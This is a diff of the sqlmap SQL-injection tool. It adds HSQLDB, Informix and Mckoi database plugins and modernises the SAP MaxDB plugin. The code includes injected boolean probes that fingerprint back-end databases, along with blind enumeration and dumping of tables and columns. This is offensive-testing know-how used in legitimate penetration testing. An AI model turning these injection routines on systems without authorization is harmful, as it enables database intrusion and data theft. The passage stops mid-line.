infoMsg = "confirming %s" % DBMS.HSQLDB + logger.info(infoMsg) + + result = inject.checkBooleanExpression("LEAST(ROUNDMAGIC(PI()),3)=3") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.HSQLDB + logger.warning(warnMsg) + + return False + else: + result = inject.checkBooleanExpression("ZERO() IS 0") # Note: check for H2 DBMS (sharing majority of same functions) + if result: + warnMsg = "the back-end DBMS is not %s" % DBMS.HSQLDB + logger.warning(warnMsg) + + return False + + kb.data.has_information_schema = True + Backend.setVersion(">= 1.7.2") + setDbms("%s 1.7.2" % DBMS.HSQLDB) + + banner = self.getBanner() + if banner: + Backend.setVersion("= %s" % banner) + else: + if inject.checkBooleanExpression("(SELECT [RANDNUM] FROM (VALUES(0)))=[RANDNUM]"): + Backend.setVersionList([">= 2.0.0", "< 2.3.0"]) + else: + banner = unArrayizeValue(inject.getValue("\"org.hsqldbdb.Library.getDatabaseFullProductVersion\"()", safeCharEncode=True)) + if banner: + Backend.setVersion("= %s" % banner) + else: + Backend.setVersionList([">= 1.7.2", "< 1.8.0"]) + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.HSQLDB + logger.warning(warnMsg) + + dbgMsg = "...or version is < 1.7.2" + logger.debug(dbgMsg) + + return False + + def getHostname(self): + warnMsg = "on HSQLDB it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def checkDbmsOs(self, detailed=False): + if Backend.getOs(): + infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() + logger.info(infoMsg) + else: + self.userChooseDbmsOs() diff --git a/plugins/dbms/hsqldb/syntax.py b/plugins/dbms/hsqldb/syntax.py new file mode 100644 index 00000000000..cfc1c86a8ca --- /dev/null +++ b/plugins/dbms/hsqldb/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHAR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/hsqldb/takeover.py b/plugins/dbms/hsqldb/takeover.py new file mode 100644 index 00000000000..f364bdf54d2 --- /dev/null +++ b/plugins/dbms/hsqldb/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on HSQLDB it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on HSQLDB it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on HSQLDB it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on HSQLDB it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/informix/__init__.py b/plugins/dbms/informix/__init__.py new file mode 100644 index 00000000000..8cb00583fbe --- /dev/null +++ b/plugins/dbms/informix/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import INFORMIX_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.informix.enumeration import Enumeration +from plugins.dbms.informix.filesystem import Filesystem +from plugins.dbms.informix.fingerprint import Fingerprint +from plugins.dbms.informix.syntax import Syntax +from plugins.dbms.informix.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class InformixMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Informix methods + """ + + def __init__(self): + self.excludeDbsList = INFORMIX_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.INFORMIX] = Syntax.escape diff --git a/plugins/dbms/informix/connector.py b/plugins/dbms/informix/connector.py new file mode 100644 index 00000000000..e6f05889c0f --- /dev/null +++ b/plugins/dbms/informix/connector.py @@ -0,0 +1,60 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import ibm_db_dbi +except: + pass + +import logging + +from lib.core.common import getSafeExString +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://github.com/ibmdb/python-ibmdb + User guide: https://github.com/ibmdb/python-ibmdb/wiki/README + API: https://www.python.org/dev/peps/pep-0249/ + License: Apache License 2.0 + """ + + def connect(self): + self.initConnection() + + try: + database = "DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (self.db, self.hostname, self.port) + self.connector = ibm_db_dbi.connect(database, self.user, self.password) + except ibm_db_dbi.OperationalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except ibm_db_dbi.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + return None + + def execute(self, query): + try: + self.cursor.execute(query) + except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except ibm_db_dbi.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.connector.commit() + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/informix/enumeration.py b/plugins/dbms/informix/enumeration.py new file mode 100644 index 00000000000..c67bdf71368 --- /dev/null +++ b/plugins/dbms/informix/enumeration.py @@ -0,0 +1,38 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def searchDb(self): + warnMsg = "on Informix searching of databases is not implemented" + logger.warning(warnMsg) + + return [] + + def searchTable(self): + warnMsg = "on Informix searching of tables is not implemented" + logger.warning(warnMsg) + + return [] + + def searchColumn(self): + warnMsg = "on Informix searching of columns is not implemented" + logger.warning(warnMsg) + + return [] + + def search(self): + warnMsg = "on Informix search option is not available" + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on Informix it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/informix/filesystem.py b/plugins/dbms/informix/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/informix/filesystem.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/informix/fingerprint.py b/plugins/dbms/informix/fingerprint.py new file mode 100644 index 00000000000..f71e6deff80 --- /dev/null +++ b/plugins/dbms/informix/fingerprint.py @@ -0,0 +1,111 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import INFORMIX_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.INFORMIX) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.INFORMIX + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(INFORMIX_ALIASES): + setDbms(DBMS.INFORMIX) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.INFORMIX + logger.info(infoMsg) + + result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSMASTER:SYSDUAL)") + + if result: + infoMsg = "confirming %s" % DBMS.INFORMIX + logger.info(infoMsg) + + result = inject.checkBooleanExpression("(SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL) IS NOT NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX + logger.warning(warnMsg) + + return False + + # Determine if it is Informix >= 11.70 + if inject.checkBooleanExpression("CHR(32)=' '"): + Backend.setVersion(">= 11.70") + + setDbms(DBMS.INFORMIX) + + self.getBanner() + + if not conf.extensiveFp: + return True + + infoMsg = "actively fingerprinting %s" % DBMS.INFORMIX + logger.info(infoMsg) + + for version in ("14.1", "12.1", "11.7", "11.5", "10.0"): + output = inject.checkBooleanExpression("EXISTS(SELECT 1 FROM SYSMASTER:SYSDUAL WHERE DBINFO('VERSION,'FULL') LIKE '%%%s%%')" % version) + + if output: + Backend.setVersion(version) + break + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/informix/syntax.py b/plugins/dbms/informix/syntax.py new file mode 100644 index 00000000000..430664adec4 --- /dev/null +++ b/plugins/dbms/informix/syntax.py @@ -0,0 +1,42 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.common import isDBMSVersionAtLeast +from lib.core.common import randomStr +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> from lib.core.common import Backend + >>> Backend.setVersion('12.10') + ['12.10'] + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHR(%d)" % _ for _ in getOrds(value)) + + retVal = expression + + if isDBMSVersionAtLeast("11.70"): + excluded = {} + for _ in re.findall(r"DBINFO\([^)]+\)", expression): + excluded[_] = randomStr() + expression = expression.replace(_, excluded[_]) + + retVal = Syntax._escape(expression, quote, escaper) + + for _ in excluded.items(): + retVal = retVal.replace(_[1], _[0]) + + return retVal diff --git a/plugins/dbms/informix/takeover.py b/plugins/dbms/informix/takeover.py new file mode 100644 index 00000000000..7c19fd8799c --- /dev/null +++ b/plugins/dbms/informix/takeover.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def __init__(self): + self.__basedir = None + self.__datadir = None + + GenericTakeover.__init__(self) diff --git a/plugins/dbms/maxdb/__init__.py b/plugins/dbms/maxdb/__init__.py index 57cd31334c1..fbf06a37e08 100644 --- a/plugins/dbms/maxdb/__init__.py +++ b/plugins/dbms/maxdb/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -23,11 +23,7 @@ class MaxDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Take def __init__(self): self.excludeDbsList = MAXDB_SYSTEM_DBS - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.MAXDB] = Syntax.escape diff --git a/plugins/dbms/maxdb/connector.py b/plugins/dbms/maxdb/connector.py index b05bf8a6d92..73b8864d24d 100644 --- a/plugins/dbms/maxdb/connector.py +++ b/plugins/dbms/maxdb/connector.py @@ -1,18 +1,15 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.connector import Connector as GenericConnector class Connector(GenericConnector): - def __init__(self): - GenericConnector.__init__(self) - def connect(self): - errMsg = "on SAP MaxDB it is not possible to establish a " + errMsg = "on SAP MaxDB it is not (currently) possible to establish a " errMsg += "direct connection" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py index 80fab44e33c..ab791f6e74c 100644 --- a/plugins/dbms/maxdb/enumeration.py +++ b/plugins/dbms/maxdb/enumeration.py @@ -1,23 +1,33 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -from lib.core.common import Backend -from lib.core.common import randomStr +import re + +from lib.core.common import isListLike +from lib.core.common import isTechniqueAvailable +from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.data import paths from lib.core.data import queries +from lib.core.enums import DBMS +from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapNoneDataException +from lib.core.exception import SqlmapUserQuitException from lib.core.settings import CURRENT_DB +from lib.utils.brute import columnExists from lib.utils.pivotdumptable import pivotDumpTable from plugins.generic.enumeration import Enumeration as GenericEnumeration +from thirdparty import six +from thirdparty.six.moves import zip as _zip class Enumeration(GenericEnumeration): def __init__(self): @@ -27,7 +37,7 @@ def __init__(self): def getPasswordHashes(self): warnMsg = "on SAP MaxDB it is not possible to enumerate the user password hashes" - logger.warn(warnMsg) + logger.warning(warnMsg) return {} @@ -38,13 +48,12 @@ def getDbs(self): infoMsg = "fetching database names" logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].dbs - randStr = randomStr() + rootQuery = queries[DBMS.MAXDB].dbs query = rootQuery.inband.query - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.schemaname' % randStr], blind=True) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.schemaname' % kb.aliasName], blind=True) if retVal: - kb.data.cachedDbs = retVal[0].values()[0] + kb.data.cachedDbs = next(six.itervalues(retVal[0])) if kb.data.cachedDbs: kb.data.cachedDbs.sort() @@ -61,26 +70,26 @@ def getTables(self, bruteForce=None): conf.db = self.getCurrentDb() if conf.db: - dbs = conf.db.split(",") + dbs = conf.db.split(',') else: dbs = self.getDbs() - for db in filter(None, dbs): + for db in (_ for _ in dbs if _): dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) infoMsg = "fetching tables for database" - infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs))) + infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, six.string_types) else db[0] for db in sorted(dbs))) logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].tables + rootQuery = queries[DBMS.MAXDB].tables for db in dbs: - randStr = randomStr() query = rootQuery.inband.query % (("'%s'" % db) if db != "USER" else 'USER') - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.tablename' % randStr], blind=True) + blind = not isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.tablename' % kb.aliasName], blind=blind) if retVal: - for table in retVal[0].values()[0]: + for table in list(retVal[0].values())[0]: if db not in kb.data.cachedTables: kb.data.cachedTables[db] = [table] else: @@ -91,7 +100,7 @@ def getTables(self, bruteForce=None): return kb.data.cachedTables - def getColumns(self, onlyColNames=False): + def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: @@ -99,27 +108,38 @@ def getColumns(self, onlyColNames=False): warnMsg = "missing database parameter. sqlmap is going " warnMsg += "to use the current database to enumerate " warnMsg += "table(s) columns" - logger.warn(warnMsg) + logger.warning(warnMsg) conf.db = self.getCurrentDb() elif conf.db is not None: - if ',' in conf.db: + if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) conf.db = safeSQLIdentificatorNaming(conf.db) + if conf.col: + colList = conf.col.split(',') + else: + colList = [] + + if conf.exclude: + colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] + + for col in colList: + colList[colList.index(col)] = safeSQLIdentificatorNaming(col) + if conf.tbl: - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') else: self.getTables() if len(kb.data.cachedTables) > 0: - tblList = kb.data.cachedTables.values() + tblList = list(kb.data.cachedTables.values()) - if isinstance(tblList[0], (set, tuple, list)): + if tblList and isListLike(tblList[0]): tblList = tblList[0] else: errMsg = "unable to retrieve the tables " @@ -129,32 +149,74 @@ def getColumns(self, onlyColNames=False): for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) - rootQuery = queries[Backend.getIdentifiedDbms()].columns + if bruteForce: + resumeAvailable = False + + for tbl in tblList: + for db, table, colName, colType in kb.brute.columns: + if db == conf.db and table == tbl: + resumeAvailable = True + break + + if resumeAvailable and not conf.freshQueries or colList: + columns = {} + + for column in colList: + columns[column] = None + + for tbl in tblList: + for db, table, colName, colType in kb.brute.columns: + if db == conf.db and table == tbl: + columns[colName] = colType + + if conf.db in kb.data.cachedColumns: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns + else: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): columns} + + return kb.data.cachedColumns + + message = "do you want to use common column existence check? [y/N/q] " + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() + + if choice == 'N': + return + elif choice == 'Q': + raise SqlmapUserQuitException + else: + return columnExists(paths.COMMON_COLUMNS) + + rootQuery = queries[DBMS.MAXDB].columns for tbl in tblList: - if conf.db is not None and len(kb.data.cachedColumns) > 0 \ - and conf.db in kb.data.cachedColumns and tbl in \ - kb.data.cachedColumns[conf.db]: + if conf.db is not None and len(kb.data.cachedColumns) > 0 and conf.db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[conf.db]: infoMsg = "fetched tables' columns on " infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) return {conf.db: kb.data.cachedColumns[conf.db]} + if dumpMode and colList: + table = {} + table[safeSQLIdentificatorNaming(tbl, True)] = dict((_, None) for _ in colList) + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table + continue + infoMsg = "fetching columns " infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) infoMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) - randStr = randomStr() + blind = not isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) + query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), ("'%s'" % unsafeSQLIdentificatorNaming(conf.db)) if unsafeSQLIdentificatorNaming(conf.db) != "USER" else 'USER') - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.columnname' % randStr, '%s.datatype' % randStr, '%s.len' % randStr], blind=True) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.columnname' % kb.aliasName, '%s.datatype' % kb.aliasName, '%s.len' % kb.aliasName], blind=blind) if retVal: table = {} columns = {} - for columnname, datatype, length in zip(retVal[0]["%s.columnname" % randStr], retVal[0]["%s.datatype" % randStr], retVal[0]["%s.len" % randStr]): + for columnname, datatype, length in _zip(retVal[0]["%s.columnname" % kb.aliasName], retVal[0]["%s.datatype" % kb.aliasName], retVal[0]["%s.len" % kb.aliasName]): columns[safeSQLIdentificatorNaming(columnname)] = "%s(%s)" % (datatype, length) table[tbl] = columns @@ -162,18 +224,22 @@ def getColumns(self, onlyColNames=False): return kb.data.cachedColumns - def getPrivileges(self, *args): + def getPrivileges(self, *args, **kwargs): warnMsg = "on SAP MaxDB it is not possible to enumerate the user privileges" - logger.warn(warnMsg) + logger.warning(warnMsg) return {} - def searchDb(self): - warnMsg = "on SAP MaxDB it is not possible to search databases" - logger.warn(warnMsg) - - return [] + def search(self): + warnMsg = "on SAP MaxDB search option is not available" + logger.warning(warnMsg) def getHostname(self): warnMsg = "on SAP MaxDB it is not possible to enumerate the hostname" - logger.warn(warnMsg) + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on SAP MaxDB it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/maxdb/filesystem.py b/plugins/dbms/maxdb/filesystem.py index 43fd29d2710..04f14201059 100644 --- a/plugins/dbms/maxdb/filesystem.py +++ b/plugins/dbms/maxdb/filesystem.py @@ -1,21 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): + def readFile(self, remoteFile): errMsg = "on SAP MaxDB reading of files is not supported" raise SqlmapUnsupportedFeatureException(errMsg) - def writeFile(self, wFile, dFile, fileType=None): + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): errMsg = "on SAP MaxDB writing of files is not supported" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py index c808e6d6bee..53c27d55b9d 100644 --- a/plugins/dbms/maxdb/fingerprint.py +++ b/plugins/dbms/maxdb/fingerprint.py @@ -1,13 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.agent import agent from lib.core.common import Backend from lib.core.common import Format +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -33,7 +34,7 @@ def _versionCheck(self): if not result: warnMsg = "unable to perform %s version check" % DBMS.MAXDB - logger.warn(warnMsg) + logger.warning(warnMsg) return None @@ -91,7 +92,7 @@ def getFingerprint(self): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(MAXDB_ALIASES) or conf.dbms in MAXDB_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(MAXDB_ALIASES): setDbms(DBMS.MAXDB) self.getBanner() @@ -111,7 +112,7 @@ def checkDbms(self): if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.MAXDB - logger.warn(warnMsg) + logger.warning(warnMsg) return False @@ -122,7 +123,7 @@ def checkDbms(self): return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.MAXDB - logger.warn(warnMsg) + logger.warning(warnMsg) return False diff --git a/plugins/dbms/maxdb/syntax.py b/plugins/dbms/maxdb/syntax.py index 44b62b3321f..17a0a02c257 100644 --- a/plugins/dbms/maxdb/syntax.py +++ b/plugins/dbms/maxdb/syntax.py @@ -1,16 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar" + True + """ + return expression diff --git a/plugins/dbms/maxdb/takeover.py b/plugins/dbms/maxdb/takeover.py index b6914b71c48..e93813f99ea 100644 --- a/plugins/dbms/maxdb/takeover.py +++ b/plugins/dbms/maxdb/takeover.py @@ -1,17 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.takeover import Takeover as GenericTakeover class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - def osCmd(self): errMsg = "on SAP MaxDB it is not possible to execute commands" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/mckoi/__init__.py b/plugins/dbms/mckoi/__init__.py new file mode 100644 index 00000000000..eafd1d3c868 --- /dev/null +++ b/plugins/dbms/mckoi/__init__.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import MCKOI_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.mckoi.enumeration import Enumeration +from plugins.dbms.mckoi.filesystem import Filesystem +from plugins.dbms.mckoi.fingerprint import Fingerprint +from plugins.dbms.mckoi.syntax import Syntax +from plugins.dbms.mckoi.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class MckoiMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Mckoi methods + """ + + def __init__(self): + self.excludeDbsList = MCKOI_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.MCKOI] = Syntax.escape diff --git a/plugins/dbms/mckoi/connector.py b/plugins/dbms/mckoi/connector.py new file mode 100644 index 00000000000..fe9093e7b99 --- /dev/null +++ b/plugins/dbms/mckoi/connector.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + def connect(self): + errMsg = "on Mckoi it is not (currently) possible to establish a " + errMsg += "direct connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/mckoi/enumeration.py b/plugins/dbms/mckoi/enumeration.py new file mode 100644 index 00000000000..9ccc431eaa4 --- /dev/null +++ b/plugins/dbms/mckoi/enumeration.py @@ -0,0 +1,84 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getBanner(self): + warnMsg = "on Mckoi it is not possible to get the banner" + logger.warning(warnMsg) + + return None + + def getCurrentUser(self): + warnMsg = "on Mckoi it is not possible to enumerate the current user" + logger.warning(warnMsg) + + def getCurrentDb(self): + warnMsg = "on Mckoi it is not possible to get name of the current database" + logger.warning(warnMsg) + + def isDba(self, user=None): + warnMsg = "on Mckoi it is not possible to test if current user is DBA" + logger.warning(warnMsg) + + def getUsers(self): + warnMsg = "on Mckoi it is not possible to enumerate the users" + logger.warning(warnMsg) + + return [] + + def getPasswordHashes(self): + warnMsg = "on Mckoi it is not possible to enumerate the user password hashes" + logger.warning(warnMsg) + + return {} + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on Mckoi it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getDbs(self): + warnMsg = "on Mckoi it is not possible to enumerate databases (use only '--tables')" + logger.warning(warnMsg) + + return [] + + def 